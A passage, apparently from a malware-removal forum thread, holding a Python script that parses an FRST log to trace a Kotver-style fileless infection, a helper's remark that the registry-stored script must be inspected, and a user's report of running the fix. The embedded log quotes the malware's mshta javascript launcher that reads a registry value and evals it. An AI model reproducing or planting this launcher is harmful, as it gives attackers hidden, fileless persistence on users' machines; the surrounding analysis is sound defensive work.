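2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00000424.tmp
2016-09-28 19:37 - 2016-09-28 19:38 - 00006375 _____ C:\Users\scott\Downloads\firefox-patch.js
2016-09-27 17:24 - 2016-10-08 20:42 - 00000000 ____D C:\Users\scott\AppData\Local\24b7
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\Software\Classes\4bbd: "C:\WINDOWS\system32\mshta.exe" "javascript:VGxyit7O2="oW7mjI0";k65q=new ActiveXObject("WScript.Shell");qnE8yJ="43ElWcQ";HLv8n=k65q.RegRead("HKCU\\software\\nyzpteqr\\ydbfjly");LHiU1ie="mPz";eval(HLv8n);s97cOXT="RaUV4SKB";" <===== ATTENTION
'''

RUN_RE = re.compile(
    r'^HKU\\(?P<sid>S-1-5-21-[\d-]+)\\\.\.\.\\Run: \[(?P<name>[^\]]*)\] => '
    r'"(?P<target>[^"]+)"(?P<note>.*)$')
STARTUP_RE = re.compile(r'^Startup: (?P<path>.+\.lnk) \[')
FILE_RE = re.compile(
    r'^(?P<created>\d{4}-\d\d-\d\d \d\d:\d\d) - (?P<modified>\d{4}-\d\d-\d\d \d\d:\d\d) - '
    r'(?P<size>\d+) (?P<attrs>[_A-Z]{5}) (?P<path>.+)$')
MSHTA_RE = re.compile(
    r'^HKU\\(?P<sid>S-1-5-21-[\d-]+)\\Software\\Classes\\(?P<key>[^:]+): '
    r'"(?P<exe>[^"]*mshta\.exe)" "(?P<script>javascript:.*)"', re.IGNORECASE)
REGREAD_RE = re.compile(r'RegRead\("([^"]+)"\)')


def parse_frst(text):
    """Scan FRST log text and collect the indicators relevant to this chain."""
    findings = {
        'run_entries': [],         # autostart values under HKU\<SID>\...\Run
        'startup_lnk': [],         # .lnk files in the per-user Startup folder
        'mshta_launchers': [],     # Classes keys whose command is mshta.exe javascript:
        'tmp_clusters': {},        # size -> count of ____T *.tmp files in SysWOW64
        'dropper_candidates': [],  # script files in Downloads (the firefox-patch.js lure)
    }
    tmp_sizes = Counter()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = RUN_RE.match(line)
        if m:
            findings['run_entries'].append({
                'name': m['name'],
                'target': m['target'],
                # FRST prints '*' for characters it cannot render and appends this
                # note; a value name made of control characters is meant to defeat
                # regedit and naive autorun listers.
                'invalid_name': 'invalid characters' in m['note'],
            })
            continue
        m = STARTUP_RE.match(line)
        if m:
            findings['startup_lnk'].append(m['path'])
            continue
        m = MSHTA_RE.match(line)
        if m:
            rr = REGREAD_RE.search(m['script'])
            findings['mshta_launchers'].append({
                'key': m['key'],
                'exe': m['exe'],
                # JScript source doubles backslashes; undo that to get the real path
                'regread_target': rr.group(1).replace('\\\\', '\\') if rr else None,
                'uses_eval': 'eval(' in m['script'],
            })
            continue
        m = FILE_RE.match(line)
        if m:
            path = m['path']
            low = path.lower()
            if low.endswith('.tmp') and 'T' in m['attrs'] and '\\syswow64\\' in low:
                tmp_sizes[int(m['size'])] += 1
            elif low.endswith('.js') and '\\downloads\\' in low:
                findings['dropper_candidates'].append(path)
    findings['tmp_clusters'] = dict(tmp_sizes)
    return findings


def fileless_chain(findings):
    """Link the indicators into the execution chain. Returns [] unless a
    registry-resident payload (mshta -> RegRead -> eval) is actually present."""
    launchers = [ln for ln in findings['mshta_launchers']
                 if ln['regread_target'] and ln['uses_eval']]
    if not launchers:
        return []
    chain = []
    for run in findings['run_entries']:
        flag = ' (non-printable value name)' if run['invalid_name'] else ''
        chain.append(f"Run value {run['name']!r}{flag} -> {run['target']}")
    for lnk in findings['startup_lnk']:
        chain.append(f"Startup folder -> {lnk}")
    for ln in launchers:
        chain.append(f"Classes\\{ln['key']} -> {ln['exe']} javascript: "
                     f"-> RegRead({ln['regread_target']}) -> eval()")
    return chain


if __name__ == '__main__':
    found = parse_frst(SAMPLE_FRST)
    for step in fileless_chain(found):
        print(step)
    print('identical-size ____T temp files in SysWOW64:', found['tmp_clusters'])
    print('lure files in Downloads:', found['dropper_candidates'])
```

The value the launcher reads, here HKCU\software\nyzpteqr\ydbfjly, is where the script that actually runs is stored, and it is not among the lines in either fixlist on this page; a practitioner would export and inspect that value (and the Classes key's parent) before and after the fix, since deleting the .lnk files and the .tmp files alone removes the launchers but not the stored script.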

Hi Kevin,

 

I disabled Norton and ran the fix.  All went well.  I then ran a full Norton scan, and it found and resolved a bunch more KOTVER files.  It also quarantined FRST64, LOL.  I un-quarantined that, then exported the report from Norton.

 

The Norton and Fixlog reports are attached.

 

Fingers crossed... :)

Fixlog.txt

Resolved Security Risks.txt
